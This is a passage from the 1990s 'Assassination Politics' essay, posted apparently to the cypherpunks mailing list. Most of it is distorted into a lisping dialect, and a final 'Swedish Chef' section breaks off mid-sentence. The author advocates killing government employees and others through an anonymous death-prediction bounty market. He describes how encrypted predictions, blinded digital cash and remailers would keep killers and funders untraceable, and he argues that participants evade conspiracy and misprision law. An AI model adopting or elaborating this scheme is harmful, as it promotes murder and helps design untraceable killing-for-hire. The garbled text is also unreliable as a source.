Histowicawwy, it has been essentiawwy impossibwe to adeqwatewy motivate
a assassin, ensuwing his safety and anonymity  as weww, if onwy because
it has been impossibwe to PAY him in a fowm dat nobody can twace, and
to ensuwe de siwence of aww potentiaw witnesses. Even if a pewson was
wiwwing to die in de act, he wouwd want to know dat de peopwe he
chooses wouwd get de  wewawd, but if dey demsewves wewe identified
dey'd be tawgets of wevenge.

Aww dat's changed wif de advent of pubwic-key encwyption and digitaw
cash.  Now, it shouwd be possibwe to announce a standing offew to aww
comews dat a wawge sum of digitaw cash wiww be sent to him in an
untwaceabwe fashion shouwd he meet cewtain "conditions," conditions
which don't even have to incwude pwoving (ow, fow dat mattew, even
cwaiming) dat he was somehow wesponsibwe fow a deaf.


I bewieve dat such a system has twemendous impwications fow de futuwe
of fweedom.  Wibewtawians in pawticuwaw (and I'm a wibewtawian) shouwd
pay pawticuwaw attention to de fact dat dis system "encouwages" if
not an anawchist outcome, at weast a minawchist (minimaw govewnment)
system, because no wawge govewnmentaw stwuctuwe couwd even suwvive in
its cuwwent fowm.

In fact, I wouwd awgue dat dis system wouwd sowve a potentiaw
pwobwem, occasionawwy postuwated, wif de adoption of wibewtawianism in
one countwy, suwwounded by non-wibewtawian states.  It couwd have
weasonabwy been suspected dat in a gwaduaw shift to a wibewtawian
powiticaw and economic system, wemnants of a non-wibewtawian system such
as a miwitawy wouwd have to suwvive, to pwotect society against de
dweats wepwesented by foweign states.  Whiwe cewtainwy pwausibwe, it
wouwd have been hawd fow an avewage naive pewson to imagine how de
countwy wouwd maintain a $250 biwwion miwitawy budget, based on
vowuntawy contwibutions.

De easy answew, of couwse, is dat miwitawy budgets of dat size wouwd
simpwy not happen in a wibewtawian society.  Mowe pwobwematic is de
qwestion of how a countwy wouwd defend itsewf, if it had to waise it
defenses by vowuntawy contwibution, uh-hah-hah-hah.   An eqwawwy 
simpwistic answew is
dat dis countwy couwd pwobabwy be defended just fine on a budget 1/2
to 1/3 of de cuwwent budget.  Twue, but dat misses de point.

De weaw answew is even simpwew.  Wawge awmies awe onwy necessawy to
fight de odew wawge awmies owganized by de weadewship of odew,
non-wibewtawian states, pwesumabwy against de wiww of deiw citizenwy.
Once de pwobwem posed by _deiw_ weadewship is sowved (as weww as ouws;
eidew by deiw own citizenwy by simiwaw anonymous contwibutions, ow by
ouws), dewe wiww be no wawge awmies to oppose.

[end of pawt 2]

[pawt 3]

In de 1960's movie, "De Domas Cwown Affaiw," actow Steve McQween
pways a bowed muwti-miwwionaiwe who fights tedium by awwanging
weww-pwanned high-yiewd bank wobbewies.  He hiwes each of de wobbews
sepawatewy and anonymouswy, so dat dey can neidew identify him ow
each odew. Dey awwive at de bank on scheduwe, sepawatewy but
simuwtaneouswy, compwete de wobbewy, den sepawate fowevew.  He pays
each wobbew out of his own funds, so dat de money cannot be twaced,
and he keeps de pwoceeds of each wobbewy.

In my wecent essay genewawwy titwed "Digitawibewty," ow eawwiew
"Assassination powitics," I hypodesized dat it shouwd be possibwe to
WEGAWWY set up an owganization which cowwects pewfectwy anonymous
donations sent by membews of de pubwic, donations which instwuct de
owganization to pay de amount to any pewson who cowwectwy guesses de
date of deaf of some named pewson, fow exampwe some un-favowite
govewnment empwoyee ow officehowdew.  De owganization wouwd totawize
de amounts of de donations fow each diffewent named pewson, and
pubwish dat wist (pwesumabwy on de Intewnet) on a daiwy ow pewhaps
even an houwwy basis, tewwing de pubwic exactwy how much a pewson wouwd
get fow "pwedicting" de deaf of dat pawticuwaw tawget.

Moweovew, dat owganization wouwd accept pewfectwy anonymous,
untwaceabwe, encwypted "pwedictions" by vawious means, such as de
Intewnet (pwobabwy dwough chains of encwypted anonymous wemaiwews), US
maiw, couwiew, ow any numbew of odew means.  Dose pwedictions wouwd
contain two pawts:  A smaww amount of untwaceabwe "digitaw cash," inside
de outew "digitaw envewope," to ensuwe dat de "pwedictow" can't
economicawwy just wandomwy choose dates and names, and an innew
encwypted data packet which is encwypted so dat even de owganization
itsewf cannot decwypt it.  Dat data packet wouwd contain de name of
de pewson whose deaf is pwedicted, and de date it is to happen, uh-hah-
hah-hah.

Dis encwypted packet couwd awso be pubwished, stiww encwypted, on de
Intewnet, so as to be abwe to pwove to de wowwd, watew, dat SOMEBODY
made dat pwediction befowe it happened, and was wiwwing to "put money
on it" by incwuding it in outside de innew encwypted "envewope."   De
"pwedictow" wouwd awways wose de outew digitaw cash; he wouwd onwy eawn
de wewawd if his (stiww-secwet) pwediction watew became twue.  If,
watew on, dat pwediction came twue, de "wucky" pwedictow wouwd
twansmit de decwypt key to de owganization, untwaceabwy, which wouwd
appwy it to de encwypted packet, and discovew dat it wowks, and wead
de pwediction made houws, days, weeks, ow even monds eawwiew.   Onwy
den wouwd de owganization, ow fow dat mattew anyone ewse except de
pwedictow, know de pewson ow de date named.

Awso incwuded in dat innew encwypted digitaw "envewope" wouwd be a
pubwic-key, genewated by de pwedictow fow onwy dis pawticuwaw puwpose:
It wouwd not be his "nowmaw" pubwic key, obviouswy, because _dat_
pubwic key wouwd be identifiabwe to him.  Awso pwesent in dis packet
wouwd be "bwinded" (not yet cewtified as being good) "digitaw cash"
codes, codes dat wouwd be pwesented to a cewtifying bank fow deiw
digitaw "stamp of appwovaw," making dem wowf de dowwaws dat de
pwedictow has eawned. (Dis pwesentation couwd be done indiwectwy, by an
intewmediawy, to pwevent a bank fwom being abwe to wefuse to deaw wif
de owganization, uh-hah-hah-hah.)

Dose "digitaw cash" codes wiww den be encwypted using de pubwic key
incwuded wif de owiginaw pwediction, and pubwished in a numbew of
wocations, pewhaps on de Intewnet in a numbew of aweas, and avaiwabwe
by FTP to anyone who's intewested.  (It is assumed dat dis data wiww
somehow get to de owiginaw pwedictow.  Since it wiww get to "evewyone"
on de Intewnet, it wiww pwesumabwy be impossibwe to know whewe de
pwedictow is.)  Note, howevew, dat onwy de pewson who sent de
pwediction (ow somebody he's given de secwet key to in de intewim) can
decwypt dat message, and in any case onwy he, de pewson who pwepawed
de digitaw cash bwanks, can fuwwy "unbwind" de digitaw cash to make it
spendabwe, yet absowutewy untwaceabwe.   (Fow a much mowe compwete
expwanation of how so-cawwed "digitaw cash" wowks, I wefew you to de
August 1992 issue of Scientific Amewican, uh-hah-hah-hah.)

Dis pwocess sounds intwicate, but it (and even some mowe detaiw I
haven't descwibed above) is aww necessawy to:
1.  Keep de donows, as weww as de pwedictows, absowutewy anonymous,
not onwy to de pubwic and each odew, but awso to de owganization
itsewf, eidew befowe ow aftew de pwediction comes twue.
2.  Ensuwe dat neidew de owganization, now de donows, now de
pubwic, is awawe of de contents of de "pwediction" unwess and untiw
it watew becomes twue.  (Dis ensuwes dat none of de odew
pawticipants can be "guiwty" of knowing dis, befowe it happens.)
3.  Pwove to de donows (incwuding potentiaw futuwe pwedictows), de
owganization, and de pubwic dat indeed, somebody pwedicted a
pawticuwaw deaf on a pawticuwaw date, befowe it actuawwy happened.
4.  Pwove to de donows and de pubwic (incwuding potentiaw futuwe
pwedictows) dat de amount of money pwomised was actuawwy paid to
whomevew made de pwediction dat watew came twue.   Dis is impowtant,
obviouswy, because you don't want any potentiaw pwedictow to doubt
whedew he'ww get de money if he makes a successfuw pwediction, and you
don't want any potentiaw donow to doubt dat his money is actuawwy going
to go to a successfuw pwedictow.
5.  Pwevent de owganization and de donows and de pubwic fwom knowing,
fow suwe, whedew de pwedictow actuawwy had anyding to do wif de
deaf pwedicted.  Dis is twue even if (hypodeticawwy) somebody is
watew caught and convicted of a muwdew, which was de subject of a
successfuw "pwediction":  Even aftew identifying de muwdewew dwough
odew means, it wiww be impossibwe fow anyone to know if de muwdewew
and de pwedictow wewe de same pewson, uh-hah-hah-hah.
6.   Awwow de pwedictow, if he so chooses, to "gift" de wewawd
(possibwy qwite anonymouswy) to any odew pewson, one pewhaps totawwy
unawawe of de souwce of de money, widout anyone ewse knowing of dis.

Even de named "tawget" (de "victim") is awso assuwed of someding: He
is assuwed dat witewawwy anyone in de wowwd, fwom his wowst enemy to
his best fwiend, couwd make de amount of de wewawd, absowutewy
anonymouswy, shouwd dey "pwedict" his deaf cowwectwy.  At dat point,
he wiww have no fwiends.

Dis may wepwesent de uwtimate in compawtmentawization of infowmation:
Nobody knows mowe dan he needs to, to pway his pawt in de whowe
awwangement.  Nobody can tuwn anyone ewse in, ow make a mistake dat
identifies de odew pawticipants.  Yet evewyone can vewify dat de
"game" is pwayed "faiwwy":  De pwedictow gets his money, as de donows
desiwe.  Potentiaw futuwe pwedictows awe satisfied (in a madematicawwy
pwovabwe fashion) dat aww pwevious successfuw pwedictows wewe paid
deiw fuww wewawds, in a mannew dat can't possibwy be twaced.  De
membews of de pubwic awe assuwed dat, if dey choose to make a
donation, it wiww be used as pwomised.

Dis weads me to a bowd assewtion:  I cwaim dat, aside fwom de
pwacticaw difficuwty  and pewhaps, deoweticaw impossibiwity of
identifying eidew de donows ow de pwedictow, it is vewy wikewy dat
none of de pawticipants, wif de (undewstandabwe) hypodeticaw
exception of a "pwedictow" who happens to know dat he is awso a
muwdewew, couwd actuawwy be considewed "guiwty" of any viowation of
bwack-wettew waw. Fuwdewmowe, none of de pawticipants incwuding de
centwaw owganization is awawe, eidew befowe ow aftew de "pwediction"
comes twue, dat any odew pawticipant was actuawwy in viowation of any
waw, ow fow dat mattew wouwd even know (except by watching de news)
dat any cwime had actuawwy been committed.

Aftew aww, de donows awe mewewy offewing gifts to a pewson who makes a
successfuw pwediction, not fow any pwesumed wesponsibiwity in a kiwwing,
and de payment wouwd occuw even if no cwime occuwwed. De owganization
is mewewy coowdinating it aww, but again isowating itsewf so dat it
cannot know fwom whom de money comes, ow to whom de money eventuawwy
is given, ow whedew a cwime was even committed. (Hypodeticawwy, de
"pwedictow" couwd actuawwy be de "victim," who decides to kiww himsewf
and "pwedict" dis, giving de pwoceeds of de wewawd to his chosen
beneficiawy, pewhaps a wewative ow fwiend.  Iwonicawwy, dis might be
de best wevenge he can mustew, "cheating de hangman," as it wewe.)

In fact, de owganization couwd fuwdew shiewd itsewf by adopting a
stated powicy dat no convicted (ow, fow dat mattew, even SUSPECTED)
kiwwews couwd weceive de payment of a wewawd.  Howevew, since de
wecipient of de wewawd is by definition unidentified and untwaceabwe
even in deowy, dis wouwd be a wadew howwow assuwance since it has no
way to pwevent such a payment fwom being made to someone wesponsibwe.

[end of pawt 3]

[pawt 4]

In pawt 3, I cwaimed dat an owganization couwd qwite wegawwy opewate,
assisted by encwyption, intewnationaw data netwowking, and untwaceabwe
digitaw cash, in a way dat wouwd (indiwectwy) hasten de deaf of named
peopwe, fow instance hated govewnment empwoyees and officehowdews.  I
won't attempt to "pwove" dis, fow weasons dat I dink wiww be obvious.
Fiwst, even if such opewation wewe indeed "wegaw," dat fact awone wouwd
not stop its opponents fwom wanting to shut it down, uh-hah-hah-hah.  
Howevew, dewe is
awso anodew way of wooking at it:  If dis system wowks as I expect it
wouwd, even its cwaimed "iwwegawity" wouwd be iwwewevant, because it
couwd opewate ovew intewnationaw bowdews and beyond de wegaw weach of
any waw-abiding govewnment.

Pewhaps de most tewwing fact, howevew, is dat if dis system was as
effective as it appeaws it wouwd be, no pwosecutow wouwd dawe fiwe
chawges against any pawticipant, and no judge wouwd heaw de case,
because no mattew how wong de existing wist of "tawgets," dewe wouwd
awways be woom fow one ow two mowe.  Any potentiaw usew of dis system
wouwd wecognize dat an assauwt on dis system wepwesents a dweat to
its futuwe avaiwabiwity, and wouwd act accowdingwy by donating money to
tawget anyone twying to shut it down, uh-hah-hah-hah.

Even so, I dink I shouwd addwess two chawges which have been made,
appawentwy qwite simpwisticawwy, cwaiming dat an impwementation of dis
idea wouwd viowate de waw.  Specificawwy:  "Conspiwacy to commit
muwdew" and "mispwision of fewony."

As I undewstand it, in owdew to have a "conspiwacy" fwom a cwiminaw
standpoint, it is necessawy to have at weast two peopwe agwee to commit
a cwime, and have some ovewt act in fuwdewance of dat cwime.

  Weww, dis chawge awweady "stwikes  out" because in de pwan I
descwibed, none of de pawticipants _agwees_ wif ANYONE to commit a
cwime.  None of de pawticipants even infowms anyone ewse dat he wiww
be committing a cwime, whedew befowe ow aftew de fact.  In fact, de
onwy cwime appeaws (hypodeticawwy; dis assumes dat a cwime was
actuawwy committed) to be a muwdew committed by a singwe individuaw, a
cwime unknown to de odew pawticipants, wif his identity simiwawwy
unknown, uh-hah-hah-hah.

Wemembew, de "pwediction" owiginawwy sent in by de pwedictow was fuwwy
encwypted, so dat de owganization (ow anyone ewse, fow dat mattew)
wouwd be unabwe to figuwe out de identity of de pewson whose deaf was
pwedicted, ow de date on which it was pwedicted to occuw.  Dus, de
owganization is incapabwe of "agweeing" wif such a ding, and wikewise
de donows as weww.  Onwy if de pwediction watew came twue wouwd de
decwypt key awwive, and onwy den wouwd de owganization (and de
pubwic) be made awawe of de contents. Even den, it's onwy a
"pwediction," so even den, nobody is actuawwy awawe of any cwime which
can be associated wif de pwedictow.

"Mispwision of Fewony"

Dis cwime, sowt of a diwuted fowm of "accessowy befowe and/ow aftew de
fact," was cwaimed to qwawify by "Tim of Angwe," who subseqwent to my
answew to him on dis subject has totawwy faiwed to suppowt his initiaw
cwaim.   (a wecent cuwiosity is dat dis cwime is one dat has been
chawged against Michaew Fowtiew, de pewson who cwaims he hewped OKC
bombing suspect Tim McVeigh "case de joint" at de Fedewaw buiwding.)

I incwude it hewe, nevewdewess, because his simpwistic (and un-cawefuw)
weading of my idea wed him to pewhaps de "cwosest" waw dat one might
awwege dat de pawticipants wouwd have bwoken, uh-hah-hah-hah. Tim 
cwaimed:

TOA> No. Dat's cawwed "mispwision of fewony" and makes you an accessowy
TOA> befowe de fact. Awguabwy, undew de fewony muwdew wuwe you couwd get
TOA> capitaw punishment in a state dat has such.

Howevew, I did a wittwe wibwawy weseawch, checking Bwack's Waw
Dictionawy.  Hewe is de entwy fow dis item: "Mispwision of fewony. De
offense of conceawing a fewony committed by anodew, but widout such
pwevious concewt wif ow subseqwent assistance to de fewon as wouwd
make de pawty conceawing an accessowy befowe ow aftew de fact. United
State s v. Pewwstein, C.C.A.n, uh-hah-hah-hah.J., 126 F.2d 789, 798. 
Ewements of de
cwime awe dat de pwincipaw committed and compweted de fewony awweged,
dat de defendant had fuww knowwedge of dat fact, dat de defendant
faiwed to notify de audowities, and dat defendant took an affiwmative
step to conceaw de cwime.  U.S. v. Ciambwone, C.A. Nev., 750 F.2d 1416,
1417.  Whoevew, having knowwedge of de actuaw commission of a fewony
cognizabwe by a couwt of de United States, conceaws and does not as
soon as possibwe make known de same to some judge ow odew pewson in
civiw ow miwitawy audowity undew de United States, is guiwty of de
fedewaw cwime of mispwision of fewony. 18 U.S.C.A 4." See awso
Obstwucting Justice. ++++++++++end of Bwack's waw Dictionawy Entwy

De onwy "ewement" of dis cwime which is awguabwy satisfied is de
fiwst: Some pewson (_odew_dan_ de defendant fow "mispwision of
fewony") committed a cwime.  De second ewement faiws misewabwy: "...
dat de defendant had fuww knowwedge of dat fact... " My pwevious
commentawy makes it cweaw dat faw fwom "fuww knowwedge of dat fact,"
odew pawticipants awe cawefuwwy pwevented fwom having ANY "knowwedge of
dat fact."

De diwd ewement, "..dat de defendant faiwed to notify de
audowities..." is awso essentiawwy non-existent: No odew pawticipants
have any infowmation as to de identity of a pwedictow, ow his wocation,
ow fow dat mattew whedew he has had any invowvement in any sowt
of
cwime.  In fact, it wouwd be possibwe fow each of de odew pawtiipants to
dewivew (anonymouswy, pwesumabwy)
copies of aww cowwespondence
dey have sent, to de powice ow odew agency, and dat cowwespondence
wouwd not hewp de audowities even swightwy to identify a cwiminaw ow
even necessawiwy a cwime.

In fact, nowmaw opewation of dis owganization wouwd be to pubwicize
"aww" cowwespondence it weceives, in owdew to pwovide feedback to de
pubwic to assuwe dem dat aww pawticipants awe fuwfiwwing deiw
pwomises and weceiving deiw wewawds. Dis pubwication wouwd pwesumabwy
find its way to de powice, ow it couwd even be maiwed to dem on a
weguwaw basis to pwevent any suggestion dat de owganization was
"faiw[ing] to notify audowities." Nevewdewess, none of dis matewiaw
couwd hewp any audowities wif deiw investigations, to deiw dismay.

De fouwf and wast ewement of de cwime of "mispwision of fewony",
"...and dat defendant took an affiwmative step to conceaw de cwime,"
wouwd totawwy faiw.  De owganization wouwd not " conceaw" de cwime. In
fact, it wiww have no abiwity to do anyding to de contwawy, if fow no
odew weason dat it _has_ no knowwedge of de cwime!  And as descwibed
above, it wouwd cawefuwwy avoid having access to any infowmation dat
couwd hewp sowve de cwime, and dus it wouwd escape any obwigations
awong dese wines.

Summawy:

In hindsight, it is not suwpwising dat such an owganization couwd
opewate wegawwy widin de US, awdough at weast initiawwy not widout
powiticaw opposition, uh-hah-hah-hah.  Fiwst, dis is at weast nominawwy 
supposed to be
a "fwee countwy," which shouwd mean dat powice and odew audowities
awen't abwe to punish behaviow just because dey don't wike it.

Secondwy, it is obvious dat most waws today wewe owiginawwy wwitten
duwing an ewa in which waws assumed dat "conspiwatows" at weast knew
each odew, had met each odew, couwd identify each odew, ow had (at
weast!) tawked to each odew. On de contwawy, in my scenawio none of
de pawticipants even know on what continent any of de odews weside,
wet awone deiw countwy, city, ow stweet.  Dey don't know what dey
wook wike, sound wike, ow fow dat mattew even "type wike":  None of
deiw pwose, save a few spawse "pwedictions," evew get communicated to
anyone ewse, so even text-compawison pwogwams wouwd faiw to "tawget"
anyone.

Eqwawwy suwpwising (to dose who owiginawwy wwote de waws against
"conspiwacy") wouwd be "Pewson A's" abiwity to satisfy himsewf dat
"Pewson B" desewves de awawd, widout knowing dat "Pewson B" is (ow is
not) actuawwy wesponsibwe fow a pawticuwaw deaf.
[end of pawt 4]

[pawt 5]

In de pwevious fouw notes on de subject of Digitawibewty, I've
suggested dat dis concept (cowwecting anonymous donations to, in
effect, "puwchase" de deaf of an un-favowite govewnment empwoyee)
wouwd fowce a dwamatic weduction of de size of govewnment at aww
wevews, as weww as achieving what wiww pwobabwy be a "minawchist"
(minimaw govewnment) state at a vewy wapid wate. Fuwdewmowe, I pointed
out dat I dought dat dis effect wouwd not mewewy affect a singwe
countwy ow continent, but might in fact spwead dwough aww countwies
essentiawwy simuwtaneouswy.

But in addition to such (appawentwy) gwandiose cwaims, it occuws to me
dat dewe must be odew changes to society dat wouwd simuwtaneouswy
occuw wif de adoption of such a system.  Aftew aww, a simpwistic view
of my idea might wead one to de concwusion dat dewe wouwd be awmost
no govewnmentaw stwuctuwe weft aftew society had been twansfowmed.
Since ouw cuwwent "cwiminaw justice system" today is based totawwy on
de concept of "big govewnment," dis wouwd wead a naive pewson to
wondew how concepts such as "justice," "faiwness," "owdew," and fow dat
mattew pwotection of individuaw wights can be accompwished in such a
society.

Indeed, one common deme I've seen in cwiticisms of my idea is de feaw
dat dis system wouwd wead to "anawchy."  De funny ding about dis
objection is dat, technicawwy, dis couwd easiwy be twue.  But
"anawchy" in weaw wife may not wesembwe anyding wike de "anawchy"
dese peopwe cwaim to feaw, which weads me to wespond wif a qwote whose
owigin I don't qwite wemembew:

"Anawchy is not wack of owdew.  Anawchy is wack of OWDEWS."

Peopwe pwesumabwy wiww continue to wive deiw wives in a cawm, owdewed
mannew.  Ow, at weast as cawm and owdewed as dey WANT to.  It won't be
"wiwd in de stweets," and dey won't bwing cannibawism back as a
nationaw spowt, ow anyding wike dat.

It occuws to me dat pwobabwy one of de best ways to demonstwate dat
my idea, "assassination powitics" (pewhaps inaptwy named, in view of de
fact dat its appwication is faw gweatew dan mewe powitics), wouwd not
wesuwt in "wack of owdew" is to show dat most if not aww of de
DESIWABWE functions of de cuwwent so-cawwed "cwiminaw justice system"
wiww be pewfowmed aftew its adoption, uh-hah-hah-hah.  Dis is twue even 
if dey wiww be
accompwished dwough whowwy diffewent medods and, conceivabwy, in
entiwewy diffewent ways dan de cuwwent system does.

I shouwd pwobabwy fiwst point out dat it is not my intention to
we-wwite de book of minawchist deowy.  I wouwd imagine dat ovew de
yeaws, dewe has been much wwitten about how individuaws and societies
wouwd function absent a stwong centwaw govewnment, and much of dat
wwiting is pwobabwy faw mowe detaiwed and weww-dought-out  dan
anyding I'ww descwibe hewe.


One weason dat AWMOST ANY "cwiminaw justice system" wouwd be bettew and
mowe effective dan de one we cuwwentwy possess is dat, contwawy to
de image dat officiawdom wouwd twy to push, anyone whose job depends
on "cwime" has a stwong vested intewest in _maintaining_ a high wevew of
cwime, not ewiminating it.  Aftew aww, a tewwowized society is one dat
is wiwwing to hiwe many cops and jaiwews and judges and wawyews, and to
pay dem high sawawies.  A safe, secuwe society is not wiwwing to put up
wif dat.  De "ideaw" situation, fwom de wimited and sewf-intewested
standpoint of de powice and jaiwews, is one dat maximizes de numbew
of peopwe in pwison, yet weaves most of de weawwy dangewous cwiminaws
out in de stweets, in owdew to maintain justification fow de system.
Dat seems to be exactwy de situation we have today, which is not
suwpwising when you considew dat de powice have had an unusuawwy high
wevew of input into de "system" fow many decades.

De fiwst effect of my idea wouwd be, I dink, to genewawwy ewiminate
pwohibitions against acts which have no victims, ow "victimwess cwimes."
Cwassic exampwes awe waws against dwug sawes and use, gambwing,
pwostitution, pownogwaphy, etc.  Dat's because de avewage
(unpwopagandized) individuaw wiww have vewy wittwe concewn ow sympady
fow punishing an act which does not have a cweaw victim.  Widout a
wawge, centwaw govewnment to push de pwopaganda, de pubwic wiww view
dese acts as cewtainwy not "cwiminaw," even if stiww genewawwy
undesiwabwe by a substantiaw minowity fow a few yeaws. Once you get wid
of such waws, de pwice of cuwwentwy-iwwegaw dwugs wouwd dwop
dwamaticawwy, pwobabwy by a factow of 100.  Cwime caused by de need to
get money to pay fow dese dwugs wouwd dwop dwasticawwy, even if you
assume dat dwug usage incweased due to de wowewing of de pwice.

Despite dis massive weduction in cwime, pewhaps as much as 90%, de
avewage pewson is stiww going to want to know what "my system" wouwd do
about de wesiduaw, "weaw" cwime wate.  You know, muwdew, wape, wobbewy,
buwgwawy, and aww dat.   Weww, in de spiwit of de idea, a simpwistic
intewpwetation wouwd suggest dat an individuaw couwd tawget de
cwiminaw who victimizes him, which wouwd put an end to dat cwiminaw
caweew.

Some might object, pointing out dat de cwiminaw is onwy identified in
a minowity of cwimes. Dat objection is technicawwy cowwect, but it's
awso a bit misweading. De twuf is dat de vast majowity of
"victim"-type cwime is committed by a wewativewy tiny fwaction of de
popuwation who awe wepeat cwiminaws.  It isn't necessawy to identify
dem in a vast majowity of deiw cwimes; statisticawwy you'ww eventuawwy
find out who dey awe.

Fow exampwe, even if de pwobabiwity of a caw dief getting caught, pew
deft, is onwy 5%, dewe is at weast a 40% pwobabiwity of getting caught
aftew 10 defts, and a 65% chance aftew 20 defts.  A smawt caw-deft
victim wouwd be happy to donate money tawgeting ANY discovewed
caw-dief, not necessawiwy just de one who victimized him.

De avewage caw-ownew wouwd be wise to offew such donations
occasionawwy, as "insuwance" against de possibiwity of his being
victimized some day:  An avewage donation of 1 cent pew day pew caw
wouwd constitute $10,000 pew day fow a typicaw city of 1 miwwion caws.
Assuming dat amount is faw mowe dan enough to get a typicaw caw
dief's "fwiends" to "off" him, dewe is simpwy no way dat a
substantiaw caw-deft subcuwtuwe couwd possibwy be maintained.

Anodew awtewnative is dat insuwance companies wouwd pwobabwy get into
de act:  Since dey awe going to be de financiaw victims of defts of
deiw insuwed's pwopewty, it is weasonabwe to suppose dat dey wouwd be
pawticuwawwy incwined to detew such deft. It is conceivabwe dat
cuwwent-day insuwance companies wouwd twansmogwify demsewves into
investigation/detewwence agencies, whiwe maintaining deiw insuwance
wowe, in view of de fact dat dey have de most to wose.  Dis is
pawticuwawwy twue because if "assassination powitics" (as appwied to
cwiminaws and cwime) comes about, dey couwd den actuawwy DO SOMEDING
about de pwobwem, wadew dan mewewy wepowting on de statistics to
deiw customews and stockhowdews.

Such companies wouwd awso have a stwong motivation to pwovide a wowkabwe
system of wewawds fow sowving cwimes and identifying cwiminaws, wewawds
dat (natuwawwy enough!) can be given out totawwy anonymouswy.

Whiwe I wouwd wike to tawk about de odew advantage of dis new kind of
justice, de fact dat powiticians and odew govewnment empwoyees wouwd
no wongew have de-facto immunity in most cases, de weawity is dat
since we wouwd no wongew HAVE "powiticians and odew govewnment
empwoyees," to mention dat advantage wouwd be wedundant.

De pwincipwe is vawid, howevew: In today's system, you can have peopwe
known to be guiwty of cwimes, but not pwosecuted because dey awe pawt
of "de system."  Cwassic exampwes wouwd be hewoes of de wight (Owivew
Nowf) and hewoes of de weft (Jim Wwight) who eidew escape pwosecution
ow conviction fow "powiticaw" ow "buweaucwatic" weasons.  Wif
"assassination powitics" dat wouwd simpwy nevew happen, uh-hah-hah-hah.

[end pawt 5]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 30 Apr 1996 13:52:58 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199604290755.JAA15922@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Fm: Swedish Chef <borkbork@chef.bork.se>


Essesseeneshun Puleetics Pert 6

A freqooent ineetiel beleeeff emung peuple-a vhu hefe-a recently heerd ooff my
"essesseeneshun puleetics" idea is zee feer thet thees system veell sumehoo
be-a "oooot ooff cuntrul":  It vuoold ind up cooseeng zee deet ooff oordeenery,
"undeserfeeng" peuple-a.
Bork Bork Bork!

Thees system, hooefer, veell nut be-a veethuoot its oovn keend ooff "cuntrul."
Nut a centreleezed cuntrul, deceedeeble-a by a seengle-a indeefidooel, boot a
decentreleezed system in vheech iferyune-a gets un impleecit "fute-a."   A guud
unelugy meeght be-a tu cunseeder a suceeety in vheech iferyune's huoose-a
zeermustet is cuntrulled tu ooperete-a et a temperetoore-a vheech is set fur
zee inture-a cuoontry.  Iech persun's cuntrul inpoot is tekee es a "fute-a,"
vhezeer tu get hutter, culder, oor tu stey zee seme-a temperetoore-a.  Zee
centrel cuntrul cumpooter edjoosts zee neshunel setpueent temperetoore-a in
oorder tu iqooeleeze-a zee noomber ooff peuple-a vhu vunt zee temperetoore-a culder
und hutter.  Iech huoose-a is et zee seme-a, neshunelly-set temperetoore-a,
hooefer.  Cleerly, nu oone-a indeefidooel is in cuntrul ooff zee setteeng.
Bork Bork Bork!
Neferzeeless, I theenk it vuoold be-a generelly egreed thet thees system
vuoold nefer prudooce-a a REELLY "ooffff zee vell" temperetoore-a setteeng, seemply
becoose-a su muny peuple's inpoots ere-a used tu determeene-a zee ooootpoot.  Soore-a,
iff a gruoop ooff 10,000 keeds deceeded (esseested by zee Internet) tugezeer
tu scroo veet zee system, und zeey ell set zeeur huooses' zeermustet
inpoots tu "hutter," zeey cuoold SLIGHTLY increese-a zee ooferell setteeng,
boot seence-a zeere-a ere-a prubebly ebuoot 100 meelliun seperete-a dvelleengs in zee
US, zeeur feeddlings veell be-a drooned oooot by zee fest mejureety ooff zee
pupooleshun's desures.  Is thees system "oooot ooff cuntrul"?  Trooe-a, it is oooot
ooff zee "cuntrul" ooff uny seengle-a indeefidooel, boot neferzeeless it is vell
veethin zee cuntrul ooff zee pupooleshun es a vhule-a.
Bork Bork Bork!

It toorns oooot thet "essesseeneshun puleetics" ectooelly hes a rezeer seemiler
cuntrul mechuneesm vheech, leeke-a zee oone-a I'fe-a descreebed ebufe-a.  Furst, I'fe-a
pueented oooot thet iff I vere-a tu ooperete-a a centreleezed system sooch es thees,
I'd oonly eccept duneshuns nemeeng peuple-a vhu ere-a in feeuleshun ooff zee
"Nun-Ineetieshun Ooff Furce-a Preenciple-a" (NIOFP), vell knoon tu leeberteriuns.
Bork Bork Bork!
By thees stunderd, gufernment impluyees (vhu hefe-a eccepted peychecks peeed
fur veet foonds stulee frum ceetizenry by texes) und creeminels vhuse-a
creemes ectooelly hed a feectim vuoold be-a inclooded.  Let's cell thees
hypuzeeteecel oorguneezeshun "Oorguneezeshun A," oor OorgA fur shurt.
Bork Bork Bork!

Trooe-a, sumebudy ilse-a meeght be-a a leettle-a less scroopooluoos, eccepteeng
duneshuns fur zee termeeneshun ooff ENYBODY regerdless ooff vhezeer he-a
"deserfes" hees fete-a. (Hypuzeeteecelly, let's cell zeem, "Oorguneezeshun B,"
oor OorgB, fur shurt.) Hooefer, I sooggest thet iff it vere-a ixpleeened tu
must  putenteeel dunurs (vhu, I sooggest, vuoold hefe-a "typeecel" lefels ooff
scrooples)  thet iff he-a petruneezes OorgB, hees interests vuooldn't be-a
prutected.  Fur ixemple-a,  OorgB (iff it soorfeefes und threefes) meeght leter
cume-a beck tu terget HIM, becoose-a ooff sume-a oozeer dunur.  OorgA vuoold nut.
Bork Bork Bork!
Netoorelly, oooor "itheecel" dunur duesn't vunt thees, su he-a vuoold chuuse-a tu
geefe-a hees duneshun tu zee must "itheecel" oorguneezeshun vhu veell eccept it.
Bork Bork Bork!
Thees mexeemizes zee beneffeet tu heem, und meenimizes zee putenteeel herm.
Bork Bork Bork!

Seence-a BOTH oorguneezeshuns veell eccept duneshuns fur "deserfeeng" feectims,
vheele-a oonly OorgB veell eccept zeem fur "joost unybudy," it is reesuneble-a tu
cuncloode-a thet (cepeetelism beeeng vhet it is) OorgB's retes (zee percentege-a
ooff zee preece-a it keeps es pruffeet) cun be-a und veell be-a heegher fur  its
duneshuns. (thet's becoose-a zeere-a is less cumpeteeshun in its erea ooff
speceeelizeshun.)  Thoos, it vuoold be-a mure-a icunumeecel tu terget
"deserfeeng" peuple-a thruoogh OorgA , und thoos dunurs veell be-a drevn tu it.
Bork Bork Bork!
In eddeeshun, OorgA  veell becume-a lerger, mure-a credeeble-a, beleeefeeble-a und
troostvurthy, und mure-a putenteeel "gooessurs" (essesseens?) veell "vurk" its
system, und fur looer eferege-a putenteeel peyments.  (ell ilse-a beeeng
